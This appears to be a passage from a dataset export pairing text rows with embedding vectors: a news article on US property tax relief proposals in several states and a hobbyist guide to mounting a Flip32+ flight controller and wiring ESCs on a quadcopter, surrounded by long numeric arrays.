0.03516639769077301,\n -0.024795586243271828,\n 0.054801274091005325,\n -0.049060262739658356,\n -0.04480913281440735,\n -0.0030796886421740055,\n 0.03486935794353485,\n 0.01221027784049511,\n 0.016398154199123383,\n 0.024438196793198586,\n 0.033649686723947525,\n -0.011812213808298111,\n 0.015518932603299618,\n 0.006626511923968792,\n -0.08223450183868408,\n -0.05005241930484772,\n 0.0748443454504013,\n 0.025199836120009422,\n -0.005315226037055254,\n 0.029847566038370132,\n -0.011331849731504917,\n 0.04034288972616196,\n 0.01715981774032116,\n -0.05375414341688156,\n -0.03590613976120949,\n -0.037908654659986496,\n 0.005930843763053417,\n -0.01388956792652607,\n 0.004123818129301071,\n -0.10262307524681091,\n 0.01628405973315239,\n -0.036235321313142776,\n -0.01778610795736313,\n -0.043259453028440475,\n -7.46718019212076e-33,\n -0.00544802937656641,\n 0.042049113661050797,\n 0.08542150259017944,\n 0.07904887199401855,\n 0.006372642703354359,\n 0.061535708606243134,\n 0.04617927223443985,\n 0.06708767265081406,\n 0.025119595229625702,\n -0.03591705858707428,\n 0.00574831385165453,\n 0.018342580646276474,\n -0.04164810851216316,\n 0.04167773947119713,\n 0.027481399476528168,\n 0.0005334684392437339,\n -0.0127094192430377,\n -0.006745372898876667,\n 0.01118866354227066,\n 0.014139266684651375,\n 0.09859984368085861,\n -0.008028609678149223,\n 0.01889883726835251,\n 0.02926632948219776,\n -0.05053522437810898,\n -0.06946717947721481,\n 0.07891207933425903,\n 0.06914965808391571,\n -0.16178978979587555,\n 0.09033603221178055,\n 0.06028355285525322,\n 0.0018959876615554094,\n 0.05742161348462105,\n -0.02446732297539711,\n -0.00015970882668625563,\n 0.0008994676754809916,\n -0.06708913296461105,\n -0.0155935762450099,\n 0.07848633825778961,\n -0.039054542779922485,\n 0.019491072744131088,\n -0.08238793164491653,\n 0.014988434500992298,\n -0.03016958199441433,\n 0.02406909130513668,\n -0.05374991521239281,\n 0.024828677996993065,\n -0.011835034936666489,\n 0.015711862593889236,\n -0.05580856278538704,\n -0.042925771325826645,\n 0.031636595726013184,\n -0.09982528537511826,\n 0.09202593564987183,\n -0.07149346172809601,\n -0.037205472588539124,\n -0.10382717102766037,\n 0.05464659258723259,\n 0.03277409076690674,\n 0.0032864909153431654,\n -0.02018679492175579,\n -0.027556495741009712,\n -0.11092612147331238,\n -0.03822210058569908,\n -0.013445299118757248,\n 0.049742989242076874,\n 0.03704205900430679,\n -0.03973779454827309,\n -0.022511955350637436,\n -0.04439806193113327,\n 0.025240981951355934,\n -0.06876344233751297,\n 0.04619143530726433,\n 0.01706150732934475,\n -0.039696574211120605,\n -0.03471002355217934,\n -0.009147081524133682,\n 0.07427653670310974,\n 0.001432653865776956,\n 0.06788170337677002,\n 0.03519049286842346,\n -0.027146311476826668,\n -0.07605598121881485,\n 0.0382767915725708,\n 0.06609813123941422,\n 0.11433148384094238,\n 0.042852357029914856,\n 0.02736973576247692,\n -0.0536850206553936,\n 0.036366675049066544,\n 0.06630988419055939,\n -0.007335127796977758,\n 0.016010494902729988,\n 0.009654974564909935,\n 0.0725824311375618,\n -5.301710004346205e-8,\n 0.05208538472652435,\n 0.12750375270843506,\n 0.03170407935976982,\n 0.04743869602680206,\n -0.011520802974700928,\n -0.001135513768531382,\n 0.026378275826573372,\n 0.004814741667360067,\n 0.05229104310274124,\n 0.04121952876448631,\n -0.004205872304737568,\n -0.0220524650067091,\n -0.023500561714172363,\n 0.0675637274980545,\n 0.017968837171792984,\n 0.031500108540058136,\n -0.07369408011436462,\n 0.06827808171510696,\n -0.0056877718307077885,\n 0.03701673448085785,\n -0.05554262921214104,\n -0.035282403230667114,\n 0.06148736551403999,\n 0.046722181141376495,\n -0.020086620002985,\n -0.10308033972978592,\n -0.14934027194976807,\n -0.0918082520365715,\n -0.017271097749471664,\n -0.012826806865632534,\n 0.011630700901150703,\n 0.02062240242958069,\n 0.0027802607510238886,\n -0.10038763284683228,\n -0.058141522109508514,\n -0.03284963592886925,\n -0.04860454052686691,\n -0.03354370594024658,\n 0.10212158411741257,\n -0.05410533398389816,\n -0.051954396069049835,\n -0.09853421151638031,\n -0.0050845458172261715,\n 0.020411048084497452,\n -0.03427921235561371,\n -0.06265948712825775,\n 0.07098063081502914,\n -0.026169447228312492,\n -0.1802583783864975,\n -0.0025257118977606297,\n -0.011119023896753788,\n 0.019798606634140015,\n 0.007122362032532692,\n -0.0054527767933905125,\n 0.011063016019761562,\n -0.07835516333580017,\n -0.011527366936206818,\n 0.014893213286995888,\n -0.018609028309583664,\n -0.0015701770316809416,\n 0.02568460814654827,\n -0.03597070276737213,\n -0.07359638065099716,\n 0.002983467886224389\n]"}}},{"rowIdx":1287,"cells":{"text":{"kind":"string","value":"Democratic Gov. Andrew Cuomo of New York speaks to reporters about his proposal to offer a $1.7 billion property tax credit for homeowners and renters. His was among proposals in several states this year to provide tax relief for property taxpayers. (AP)\n\nWith some of the highest median property taxes in the nation, it’s no surprise that relief is at the top of many political agendas in New York, Connecticut and New Jersey.\n\nCounties that surround New York City in those three states account for 18 of the 20 highest-taxed counties in the nation, according to a Stateline analysis of the U.S. Census’ 2013 American Community Survey data, which is the latest available.\n\nBut they aren’t the only states where homeowners feel pressure from property taxes, which are rising faster than inflation nationally and prompting lawmakers to look for ways to provide relief. Median property taxes rose 57 percent from $1,334 in 2000 to $2,090 in 2013, while inflation was only 35 percent during the period.\n\n(See the map for the latest median property taxes in each state, and the county with the highest median property taxes in each state.)\n\nTexas lawmakers, for instance, are debating as much as a $2.2 billion cut in property taxes. The median tax bill there is about $2,500. That bill, however, is only about a third of the $7,300 for median property tax New Jersey, and a quarter of the tax bill property owners pay in Westchester County, New York, which has the highest median levy of $10,000.\n\n“If a New Yorker heard about a property tax bill in Texas, he would say. ‘You have nothing to complain about,’” said Scott Drenkard, an economist at the Tax Foundation, a nonpartisan tax policy research group. “But Texans complain about property taxes quite a bit. If you ask them what needs to be cut, the average Texan would say it’s property taxes. It’s the tax policymakers hear the most about from their constituents. It’s the most hated tax.”\n\nAlthough states generally don’t levy property taxes (Arizona did until 1996, and Minnesota taxes some commercial and seasonal property), state lawmakers routinely look for ways to ease them at the local level with caps, subsidies, exemptions, or changes in the balance between commercial and residential tax rates. In addition to New York, Connecticut and Texas, relief proposals have been up for debate in Pennsylvania, Maine and Nebraska this year.\n\nIn New York, Democratic Gov. Andrew Cuomo talked of how “middle- and lower-income families (are) struggling under the crushing weigh of property taxes” in January, when he announced a plan for $1.7 billion in tax credits for qualifying homeowners and renters.\n\nThe legislature removed Cuomo’s proposed credit from the state budget in March. But Cuomo has said he’s continuing to negotiate it with legislative leaders and a compromise may be possible next month.\n\nThe Connecticut Legislature is considering a bill that would provide property tax relief by giving towns more money from state sales tax revenue. The state issued a report last year showing property taxes were the largest component of taxes collected in the state, raising $9.5 billion annually compared to $5.8 billion in income taxes and $3.4 billion in sales taxes.\n\nIn New Jersey, budget constraints last year forced the state to postpone scheduled property tax discounts for elderly, disabled and low-income homeowners, but they’re included in tax bills mailed out this month. A report this year by the state League of Municipalities concluded that property taxes would have to drop 35 percent to bring them into line with comparable suburbs of New York City and Philadelphia.\n\nPennsylvania’s Democratic Gov. Tom Wolf has proposed increases in state income tax and sales taxes to help fund $3.8 billion in property tax relief next year. Lawmakers are continuing to review the proposal.\n\nMaine is considering a plan from Republican Gov. Paul LePage that would remove the property tax exemption that some nonprofits now have starting in 2019. In Nebraska, plans to relieve taxes, for farmers especially, appear dead this year and instead will be studied.\n\nIn Texas, lawmakers are still debating property tax breaks. Republican Gov. Greg Abbott proposed spending $2.2 billion in state money to reimburse local schools for lost revenue from property tax relief.\n\nRelief Not Always Relief\n\nNationwide, about 75 percent of local tax revenue comes from property taxes, according to a report by the Tax Policy Center in conjunction with the Brookings Institution and the Urban Institute. The percentages range from 32 percent in the District of Columbia and 43 percent in Alabama, to 99 percent in Maine and New Hampshire.\n\nAbout half of the $446 billion collected from property taxes annually goes to schools, according to a 2007 estimate by the Lincoln Institute of Land Policy, a think tank focused on land use and taxation, which tracks property tax rates by state and tax relief programs up to 2013. The rest goes to police, fire, streets and other local government operations and services.\n\nCapping or cutting property taxes, while popular, doesn’t always provide taxpayers overall relief, however. Drenkard, the Tax Foundation economist, said many attempts at relieving the burden of property taxes only serve to shift the costs of government to income or other taxes.\n\nBecause school taxes are such a high proportion of the total property tax bill, many states have started there, offering some homeowners a state subsidy in the form of tax credits or rebates, lightening the load with more state aid to schools or giving homeowners breaks by raising taxes on commercial property.\n\nA New York state program called School Tax Relief (STAR), has offered some homeowners reduced school taxes through tax credits since 1998, with the lost revenue made up by higher state aid to schools.\n\nA 2010 study by Georgia State University’s Fiscal Research Center noted that most comprehensive efforts to overhaul state taxes, including property taxes, have remained on the drawing board.\n\n“Very few of the changes proposed appear to have been adopted,” the study concluded about efforts during the decade of the 2000s.\n\nNew York Has Highest Rates\n\nAlthough New Jersey has the highest median annual property tax at $7,331, the counties with the highest rates are in New York. Suburban Westchester is the only county in the nation where the median burden is $10,000 or more. Nearby Rockland and Nassau counties are not far behind at $9,667 and $9,522, respectively.\n\n(At the bottom is the state of Alabama, where median property taxes are $532. There are 23 counties, 13 of them in Louisiana, where median taxes are less than $200.)\n\nProperty tax relief has always been difficult in the New York City suburbs, said Gregory Holtz, a public administration professor at Pace University in Westchester County. Because wealth is so high and homes cost so much in affluent areas, there may not be enough outrage to fuel changes.\n\n“There’s very little potential for reform in New York state,” Holtz said. “Our taxes haven’t gotten that high yet. We’re going to have to be completely overburdened. When taxes are late or going into default, that’s a true sign of tax revolt or reform, and that’s not happening yet.”"},"embedding":{"kind":"list like","value":[0.05261819437146187,-0.08721262216567993,0.08230632543563843,0.03922150284051895,0.023540155962109566,-0.022065920755267143,0.012623452581465244,0.011810626834630966,-0.0922347903251648,0.0017573736840859056,0.0061827246099710464,0.0017729764804244041,-0.042391225695610046,0.024920109659433365,0.019971173256635666,0.12153279036283493,0.014634824357926846,0.008760537020862103,0.01262493897229433,0.12378844618797302,0.12604191899299622,0.0007237099343910813,0.07280838489532471,-0.023173438385128975,0.1741345226764679,-0.008276312611997128,0.014861516654491425,-0.04188163951039314,-0.02519005350768566,-0.009862501174211502,0.004333151038736105,-0.03991071879863739,-0.01718856394290924,0.018669048324227333,0.103509820997715,0.01710561104118824,0.06981883198022842,0.009034339338541031,0.040589626878499985,0.016529619693756104,-0.02420118823647499,-0.023227140307426453,0.018609993159770966,-0.007676810026168823,-0.05498272925615311,0.00050856958841905,0.06943905353546143,0.026893550530076027,0.03222883865237236,0.053535740822553635,-0.031764429062604904,0.1251603215932846,0.04041276499629021,0.02862604148685932,0.049085844308137894,-0.058907926082611084,-0.02459387667477131,0.05358076095581055,0.00446875486522913,-0.030348604544997215,-0.03632006049156189,-0.007861142978072166,0.0155879445374012,-0.019461888819932938,0.04246070608496666,-0.005471373442560434,-0.020214872434735298,-0.024044843390583992,-0.13000474870204926,-0.07952930778265,0.03289330005645752,0.04344569519162178,0.05838664248585701,-0.06632234156131744,0.062375325709581375,-0.042054034769535065,-0.024610185995697975,0.07931046932935715,-0.0005733587895520031,-0.043914876878261566,0.04026924446225166,0.00037160125793889165,-0.02442905679345131,-0.01731409691274166,-0.046356022357940674,-0.021729635074734688,-0.07342638820409775,0.03896166756749153,0.07547851651906967,0.07616539299488068,0.03733566030859947,0.021237429231405258,-0.030700532719492912,-0.026754310354590416,-0.022789375856518745,0.05596921965479851,0.0361565537750721,-0.05360077694058418,-0.014590381644666195,0.058157265186309814,-0.02437567338347435,0.007984086871147156,0.002841325243934989,0.00850248895585537,0.063073068857193,-0.035429880023002625,-0.011708135716617107,-0.00768241984769702,-0.07530590146780014,0.012763729318976402,0.016576357185840607,-0.014779816381633282,-0.04124939814209938,0.0016259296098724008,-0.02381799928843975,-0.04536275565624237,0.07198409736156464,-0.018751101568341255,0.06576256453990936,-0.085833340883255,-0.0075746625661849976,-0.0342978835105896,-0.00549930427223444,-0.010079734027385712,0.13771569728851318,0.038658201694488525,-0.07590818405151367,2.0653689209916988e-33,0.05847368389368057,0.029306801036000252,0.050807226449251175,-0.01554987020790577,-0.10822776705026627,-0.045540690422058105,0.026057986542582512,0.012466758489608765,0.006258310750126839,-0.0033943294547498226,-0.006343652959913015,0.018038997426629066,0.04967213422060013,0.011099894531071186,0.026209237053990364,-0.05362604558467865,-0.06367470324039459,-0.02730540558695793,-0.03623192384839058,-0.03257390856742859,-0.010289186611771584,0.025052914395928383,0.06715627014636993,0.047551319003105164,-0.14991435408592224,-0.05057445913553238,0.007930973544716835,0.06155611574649811,-0.046519432216882706,-0.004593982826918364,0.03324016183614731,0.09376341104507446,0.11615990847349167,0.020296160131692886,-0.058751869946718216,0.023864248767495155,0.03883150964975357,0.02559860423207283,-0.0186611320823431,-0.0226740799844265,-0.016585519537329674,-0.01906348578631878,0.09268978983163834,-0.032796140760183334,-0.026875251904129982,-0.04406134411692619,0.006889172829687595,-0.04912443086504936,-0.1242566704750061,-0.021563494578003883,0.05344502255320549,-0.005612517707049847,-0.07252141833305359,-0.02622993290424347,0.0021720323711633682,-0.013383202254772186,-0.014405711553990841,-0.06347715109586716,0.04710206016898155,0.05404212698340416,-0.12435416132211685,-0.036853570491075516,0.031169569119811058,-0.05192698910832405,-0.03439936414361,-0.054319508373737335,0.050422582775354385,0.07185277342796326,0.02228006161749363,0.13603034615516663,0.07270675897598267,0.02125517837703228,-0.07564733177423477,0.0019977008923888206,0.06917954236268997,0.0060353707522153854,-0.0074789817444980145,-0.005861739162355661,0.05073762312531471,-0.0006168631371110678,0.0323130339384079,-0.0656471773982048,-0.01976538635790348,-0.010194510221481323,0.09156671911478043,0.011345786042511463,0.013700801879167557,-0.015387095510959625,0.026870613917708397,-0.0469026044011116,-0.0157244261354208,0.0061999037861824036,0.018321329727768898,-0.07757720351219177,0.020407218486070633,-3.704581466875978e-33,-0.0226045623421669,-0.019965875893831253,0.0032037461642175913,0.046667441725730896,-0.09065761417150497,-0.05042831227183342,0.023612160235643387,-0.06212756410241127,0.006055762059986591,-0.07082568109035492,-0.058958668261766434,-0.015932369977235794,0.046419911086559296,0.08495868742465973,-0.00492970272898674,0.007586854975670576,-0.03422988951206207,-0.09763721376657486,0.04640686511993408,-0.048597533255815506,0.003271661000326276,0.07668475061655045,-0.019668955355882645,0.129656121134758,-0.11350391805171967,-0.07781796902418137,-0.14491423964500427,0.020352235063910484,0.036516010761260986,0.004223566967993975,-0.01683310978114605,0.018889103084802628,0.021798821166157722,-0.013899522833526134,-0.0140686621889472,0.021026866510510445,0.02704557031393051,-0.07812265306711197,-0.037064336240291595,-0.026257796213030815,0.05751261115074158,-0.03716680407524109,-0.031656596809625626,-0.008160929195582867,0.01745143160223961,0.05209991708397865,-0.05504347383975983,-0.008035085164010525,-0.029756125062704086,0.04631177708506584,-0.013846094720065594,0.060777951031923294,-0.06394987553358078,0.04615795612335205,-0.011404669843614101,0.036248546093702316,0.011005910113453865,0.023740075528621674,-0.019138624891638756,0.03133505582809448,-0.03108903579413891,0.038077760487794876,-0.04845164343714714,0.017051788046956062,0.026862429454922676,-0.035096656531095505,-0.0012495734263211489,-0.12687550485134125,0.04152892902493477,-0.03082125447690487,-0.043428268283605576,-0.12283383309841156,-0.04698784649372101,-0.06754718720912933,-0.03397592157125473,0.03713928908109665,0.048744168132543564,0.08661587536334991,0.005264214240014553,0.02172112464904785,0.06536976248025894,-0.03616616129875183,-0.030499519780278206,-0.032037220895290375,0.011227401904761791,-0.010195734910666943,0.02665683627128601,-0.08124265819787979,-0.058578379452228546,0.06337078660726547,-0.09740813821554184,0.10862474888563156,-0.01726115122437477,-0.006902365945279598,0.028139416128396988,-5.427788707379477e-8,-0.005933291744440794,0.019235897809267044,-0.046969298273324966,0.015188747085630894,0.054364874958992004,0.05469492822885513,-0.020083921030163765,0.11500443518161774,-0.034876298159360886,-0.036670297384262085,0.15799547731876373,0.06360238790512085,-0.024192726239562035,-0.016326256096363068,-0.07056187093257904,-0.021297885105013847,-0.017962926998734474,0.06309442222118378,-0.028144078329205513,-0.019380906596779823,0.05803531035780907,0.050163403153419495,-0.04097391664981842,-0.024922523647546768,0.007274078205227852,-0.022188443690538406,0.027982795611023903,0.045711882412433624,-0.04211587831377983,-0.04741266742348671,-0.001315647503361106,-0.04123017191886902,-0.017733341082930565,0.0016873294953256845,0.04047383368015289,0.048605725169181824,-0.04078705981373787,-0.03425457701086998,0.11518661677837372,-0.019407160580158234,-0.001374569721519947,0.00429442897439003,-0.06505952775478363,-0.05513458326458931,-0.06729044765233994,-0.025451673194766045,-0.063112273812294,-0.019352508708834648,0.022341890260577202,-0.08136231452226639,-0.04581746086478233,-0.04698055610060692,-0.04020887613296509,-0.036658428609371185,0.020715512335300446,-0.02083800546824932,-0.042510900646448135,0.023808704689145088,-0.03550541773438454,-0.013834807090461254,0.07122062146663666,-0.05019596219062805,-0.050118815153837204,0.05883103981614113],"string":"[\n 0.05261819437146187,\n -0.08721262216567993,\n 0.08230632543563843,\n 0.03922150284051895,\n 0.023540155962109566,\n -0.022065920755267143,\n 0.012623452581465244,\n 0.011810626834630966,\n -0.0922347903251648,\n 0.0017573736840859056,\n 0.0061827246099710464,\n 0.0017729764804244041,\n -0.042391225695610046,\n 0.024920109659433365,\n 0.019971173256635666,\n 0.12153279036283493,\n 0.014634824357926846,\n 0.008760537020862103,\n 0.01262493897229433,\n 0.12378844618797302,\n 0.12604191899299622,\n 0.0007237099343910813,\n 0.07280838489532471,\n -0.023173438385128975,\n 0.1741345226764679,\n -0.008276312611997128,\n 0.014861516654491425,\n -0.04188163951039314,\n -0.02519005350768566,\n -0.009862501174211502,\n 0.004333151038736105,\n -0.03991071879863739,\n -0.01718856394290924,\n 0.018669048324227333,\n 0.103509820997715,\n 0.01710561104118824,\n 0.06981883198022842,\n 0.009034339338541031,\n 0.040589626878499985,\n 0.016529619693756104,\n -0.02420118823647499,\n -0.023227140307426453,\n 0.018609993159770966,\n -0.007676810026168823,\n -0.05498272925615311,\n 0.00050856958841905,\n 0.06943905353546143,\n 0.026893550530076027,\n 0.03222883865237236,\n 0.053535740822553635,\n -0.031764429062604904,\n 0.1251603215932846,\n 0.04041276499629021,\n 0.02862604148685932,\n 0.049085844308137894,\n -0.058907926082611084,\n -0.02459387667477131,\n 0.05358076095581055,\n 0.00446875486522913,\n -0.030348604544997215,\n -0.03632006049156189,\n -0.007861142978072166,\n 0.0155879445374012,\n -0.019461888819932938,\n 0.04246070608496666,\n -0.005471373442560434,\n -0.020214872434735298,\n -0.024044843390583992,\n -0.13000474870204926,\n -0.07952930778265,\n 0.03289330005645752,\n 0.04344569519162178,\n 0.05838664248585701,\n -0.06632234156131744,\n 0.062375325709581375,\n -0.042054034769535065,\n -0.024610185995697975,\n 0.07931046932935715,\n -0.0005733587895520031,\n -0.043914876878261566,\n 0.04026924446225166,\n 0.00037160125793889165,\n -0.02442905679345131,\n -0.01731409691274166,\n -0.046356022357940674,\n -0.021729635074734688,\n -0.07342638820409775,\n 0.03896166756749153,\n 0.07547851651906967,\n 0.07616539299488068,\n 0.03733566030859947,\n 0.021237429231405258,\n -0.030700532719492912,\n -0.026754310354590416,\n -0.022789375856518745,\n 0.05596921965479851,\n 0.0361565537750721,\n -0.05360077694058418,\n -0.014590381644666195,\n 0.058157265186309814,\n -0.02437567338347435,\n 0.007984086871147156,\n 0.002841325243934989,\n 0.00850248895585537,\n 0.063073068857193,\n -0.035429880023002625,\n -0.011708135716617107,\n -0.00768241984769702,\n -0.07530590146780014,\n 0.012763729318976402,\n 0.016576357185840607,\n -0.014779816381633282,\n -0.04124939814209938,\n 0.0016259296098724008,\n -0.02381799928843975,\n -0.04536275565624237,\n 0.07198409736156464,\n -0.018751101568341255,\n 0.06576256453990936,\n -0.085833340883255,\n -0.0075746625661849976,\n -0.0342978835105896,\n -0.00549930427223444,\n -0.010079734027385712,\n 0.13771569728851318,\n 0.038658201694488525,\n -0.07590818405151367,\n 2.0653689209916988e-33,\n 0.05847368389368057,\n 0.029306801036000252,\n 0.050807226449251175,\n -0.01554987020790577,\n -0.10822776705026627,\n -0.045540690422058105,\n 0.026057986542582512,\n 0.012466758489608765,\n 0.006258310750126839,\n -0.0033943294547498226,\n -0.006343652959913015,\n 0.018038997426629066,\n 0.04967213422060013,\n 0.011099894531071186,\n 0.026209237053990364,\n -0.05362604558467865,\n -0.06367470324039459,\n -0.02730540558695793,\n -0.03623192384839058,\n -0.03257390856742859,\n -0.010289186611771584,\n 0.025052914395928383,\n 0.06715627014636993,\n 0.047551319003105164,\n -0.14991435408592224,\n -0.05057445913553238,\n 0.007930973544716835,\n 0.06155611574649811,\n -0.046519432216882706,\n -0.004593982826918364,\n 0.03324016183614731,\n 0.09376341104507446,\n 0.11615990847349167,\n 0.020296160131692886,\n -0.058751869946718216,\n 0.023864248767495155,\n 0.03883150964975357,\n 0.02559860423207283,\n -0.0186611320823431,\n -0.0226740799844265,\n -0.016585519537329674,\n -0.01906348578631878,\n 0.09268978983163834,\n -0.032796140760183334,\n -0.026875251904129982,\n -0.04406134411692619,\n 0.006889172829687595,\n -0.04912443086504936,\n -0.1242566704750061,\n -0.021563494578003883,\n 0.05344502255320549,\n -0.005612517707049847,\n -0.07252141833305359,\n -0.02622993290424347,\n 0.0021720323711633682,\n -0.013383202254772186,\n -0.014405711553990841,\n -0.06347715109586716,\n 0.04710206016898155,\n 0.05404212698340416,\n -0.12435416132211685,\n -0.036853570491075516,\n 0.031169569119811058,\n -0.05192698910832405,\n -0.03439936414361,\n -0.054319508373737335,\n 0.050422582775354385,\n 0.07185277342796326,\n 0.02228006161749363,\n 0.13603034615516663,\n 0.07270675897598267,\n 0.02125517837703228,\n -0.07564733177423477,\n 0.0019977008923888206,\n 0.06917954236268997,\n 0.0060353707522153854,\n -0.0074789817444980145,\n -0.005861739162355661,\n 0.05073762312531471,\n -0.0006168631371110678,\n 0.0323130339384079,\n -0.0656471773982048,\n -0.01976538635790348,\n -0.010194510221481323,\n 0.09156671911478043,\n 0.011345786042511463,\n 0.013700801879167557,\n -0.015387095510959625,\n 0.026870613917708397,\n -0.0469026044011116,\n -0.0157244261354208,\n 0.0061999037861824036,\n 0.018321329727768898,\n -0.07757720351219177,\n 0.020407218486070633,\n -3.704581466875978e-33,\n -0.0226045623421669,\n -0.019965875893831253,\n 0.0032037461642175913,\n 0.046667441725730896,\n -0.09065761417150497,\n -0.05042831227183342,\n 0.023612160235643387,\n -0.06212756410241127,\n 0.006055762059986591,\n -0.07082568109035492,\n -0.058958668261766434,\n -0.015932369977235794,\n 0.046419911086559296,\n 0.08495868742465973,\n -0.00492970272898674,\n 0.007586854975670576,\n -0.03422988951206207,\n -0.09763721376657486,\n 0.04640686511993408,\n -0.048597533255815506,\n 0.003271661000326276,\n 0.07668475061655045,\n -0.019668955355882645,\n 0.129656121134758,\n -0.11350391805171967,\n -0.07781796902418137,\n -0.14491423964500427,\n 0.020352235063910484,\n 0.036516010761260986,\n 0.004223566967993975,\n -0.01683310978114605,\n 0.018889103084802628,\n 0.021798821166157722,\n -0.013899522833526134,\n -0.0140686621889472,\n 0.021026866510510445,\n 0.02704557031393051,\n -0.07812265306711197,\n -0.037064336240291595,\n -0.026257796213030815,\n 0.05751261115074158,\n -0.03716680407524109,\n -0.031656596809625626,\n -0.008160929195582867,\n 0.01745143160223961,\n 0.05209991708397865,\n -0.05504347383975983,\n -0.008035085164010525,\n -0.029756125062704086,\n 0.04631177708506584,\n -0.013846094720065594,\n 0.060777951031923294,\n -0.06394987553358078,\n 0.04615795612335205,\n -0.011404669843614101,\n 0.036248546093702316,\n 0.011005910113453865,\n 0.023740075528621674,\n -0.019138624891638756,\n 0.03133505582809448,\n -0.03108903579413891,\n 0.038077760487794876,\n -0.04845164343714714,\n 0.017051788046956062,\n 0.026862429454922676,\n -0.035096656531095505,\n -0.0012495734263211489,\n -0.12687550485134125,\n 0.04152892902493477,\n -0.03082125447690487,\n -0.043428268283605576,\n -0.12283383309841156,\n -0.04698784649372101,\n -0.06754718720912933,\n -0.03397592157125473,\n 0.03713928908109665,\n 0.048744168132543564,\n 0.08661587536334991,\n 0.005264214240014553,\n 0.02172112464904785,\n 0.06536976248025894,\n -0.03616616129875183,\n -0.030499519780278206,\n -0.032037220895290375,\n 0.011227401904761791,\n -0.010195734910666943,\n 0.02665683627128601,\n -0.08124265819787979,\n -0.058578379452228546,\n 0.06337078660726547,\n -0.09740813821554184,\n 0.10862474888563156,\n -0.01726115122437477,\n -0.006902365945279598,\n 0.028139416128396988,\n -5.427788707379477e-8,\n -0.005933291744440794,\n 0.019235897809267044,\n -0.046969298273324966,\n 0.015188747085630894,\n 0.054364874958992004,\n 0.05469492822885513,\n -0.020083921030163765,\n 0.11500443518161774,\n -0.034876298159360886,\n -0.036670297384262085,\n 0.15799547731876373,\n 0.06360238790512085,\n -0.024192726239562035,\n -0.016326256096363068,\n -0.07056187093257904,\n -0.021297885105013847,\n -0.017962926998734474,\n 0.06309442222118378,\n -0.028144078329205513,\n -0.019380906596779823,\n 0.05803531035780907,\n 0.050163403153419495,\n -0.04097391664981842,\n -0.024922523647546768,\n 0.007274078205227852,\n -0.022188443690538406,\n 0.027982795611023903,\n 0.045711882412433624,\n -0.04211587831377983,\n -0.04741266742348671,\n -0.001315647503361106,\n -0.04123017191886902,\n -0.017733341082930565,\n 0.0016873294953256845,\n 0.04047383368015289,\n 0.048605725169181824,\n -0.04078705981373787,\n -0.03425457701086998,\n 0.11518661677837372,\n -0.019407160580158234,\n -0.001374569721519947,\n 0.00429442897439003,\n -0.06505952775478363,\n -0.05513458326458931,\n -0.06729044765233994,\n -0.025451673194766045,\n -0.063112273812294,\n -0.019352508708834648,\n 0.022341890260577202,\n -0.08136231452226639,\n -0.04581746086478233,\n -0.04698055610060692,\n -0.04020887613296509,\n -0.036658428609371185,\n 0.020715512335300446,\n -0.02083800546824932,\n -0.042510900646448135,\n 0.023808704689145088,\n -0.03550541773438454,\n -0.013834807090461254,\n 0.07122062146663666,\n -0.05019596219062805,\n -0.050118815153837204,\n 0.05883103981614113\n]"}}},{"rowIdx":1288,"cells":{"text":{"kind":"string","value":"So now we move on to installing the flight controller onto the frame. Now, all flight controllers have an orientation and so it is important that you secure it to your frame facing the correct way (this saves a lot of a hassle later). Specifically for the Flip32+ board that we used here, the USB port is the back of the board and the opposite side is subsequently the forward facing side. You therefore have to place the flight controller so that the forward facing side is pointing in the same direction as the front of the quadcopter (for the Silver Blade #37 there is no specific 'front' so you can choose).\n\nWe secured the Flip32+ here with 3M mounting foam to the middle of the quadcopter (facing the correct way) and then we proceeded to plugging in the ESCs. We use the servo cables to plug the ESCs in (the black, red and white cable) and these plug into the output pins of the flight controller. This is because the flight controller outputs information to the ESCs to control the speed of the motor. According to which flight controller you're using, each motor is numbered 1 to 4 in a specific order (as mentioned above). You need to plug the ESC connected to motor 1 into the output pin labeled 1 on the flight controller, the ESC connected to motor 2 into the pin labeled 2 etc. You also need to plug the servo cables into the pins in the correct orientation. The three coloured wires in the cable (black, red and white) correspond to ground, voltage and signal wires respectively. You therefore need to ensure that the ground wires are connected to the ground pins, the voltage wires are connected to the voltage pins and the signal wires are connected to the signal pins. You can see this demonstrated in the pictures above. Most flight controllers will have the pins labeled with which pin is ground, which pin is voltage and which pin is signal. For example, in our Flip32+ guide, you can see that the pins are labeled with G, V and 6 (the 6 is for motor 6 but this is the signal pin)."},"embedding":{"kind":"list like","value":[0.02063465118408203,-0.06913420557975769,-0.05849296599626541,-0.049131132662296295,0.03298430144786835,0.05633186921477318,-0.02295689657330513,0.06953064352273941,0.019625330343842506,0.07997482270002365,0.1488267332315445,0.011776048690080643,-0.06638389080762863,-0.04077531769871712,-0.031046340242028236,0.039383865892887115,0.011340053752064705,-0.014869566075503826,0.027558375149965286,0.06567066162824631,0.05491838976740837,-0.08908703923225403,0.043323807418346405,-0.05810439959168434,-0.12425064295530319,0.05506819859147072,0.03093057870864868,0.010261358693242073,-0.040969111025333405,-0.08424092829227448,0.05945167317986488,-0.07815975695848465,0.01946222223341465,-0.042271796613931656,0.0028030932880938053,-0.09829040616750717,0.04232429713010788,-0.0670858696103096,-0.057297367602586746,-0.09849663078784943,-0.015205996111035347,0.01900499127805233,-0.01246968936175108,-0.020771177485585213,-0.013434706255793571,0.04523554816842079,0.03269270807504654,-0.029704539105296135,0.08798080682754517,-0.03631860017776489,0.04012148082256317,-0.06933946162462234,-0.0566670261323452,-0.05724816024303436,-0.05908459052443504,0.055659811943769455,0.009876804426312447,-0.015051616355776787,0.047246143221855164,-0.0381757877767086,0.15423645079135895,-0.02238861471414566,0.030292829498648643,-0.021013328805565834,-0.07407550513744354,-0.06801024079322815,-0.008938002400100231,-0.013779625296592712,-0.03475109115242958,0.003918464295566082,-0.007704264018684626,-0.045815374702215195,0.0043779280968010426,-0.016389569267630577,0.01695927418768406,0.00931476429104805,0.06569215655326843,0.08901336789131165,0.007341823074966669,0.009714055806398392,0.054647043347358704,0.0458124577999115,-0.01971503719687462,0.057498615235090256,0.10573781281709671,-0.050109315663576126,-0.055846668779850006,0.06116286665201187,0.01808932051062584,-0.041510701179504395,0.03422026336193085,-0.10190451145172119,0.024585703387856483,-0.04808367043733597,0.07178667932748795,-0.07333248853683472,-0.001554724178276956,-0.03794575855135918,-0.042586419731378555,0.0039908867329359055,-0.03921502083539963,-0.03374609723687172,-0.007355363108217716,0.04615369811654091,-0.04001346230506897,0.026118766516447067,-0.044692881405353546,0.01534250658005476,-0.057676609605550766,-0.0738292783498764,-0.04043672978878021,0.0668136477470398,-0.02860534004867077,0.04090325906872749,-0.014588465914130211,0.01465545129030943,-0.05974086374044418,-0.02113526500761509,0.04600954055786133,-0